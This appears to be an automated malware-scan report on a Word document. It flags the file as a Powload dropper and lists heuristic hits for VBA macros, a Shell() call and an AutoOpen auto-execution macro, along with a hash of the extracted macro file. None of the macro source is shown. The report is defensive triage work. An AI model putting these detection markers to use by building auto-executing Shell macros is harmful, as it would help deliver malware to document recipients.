Verdict: MALICIOUS
Risk score: 202

Heuristics (6):

- ClamAV: Doc.Dropper.Powload-6922834-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Powload-6922834-0
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8120 bytes | 46800935e5e383557a111879625240b51560fae8ce3ec98ca8b7c93825cd6d04 |
Preview script: first 1,000 lines of the extracted script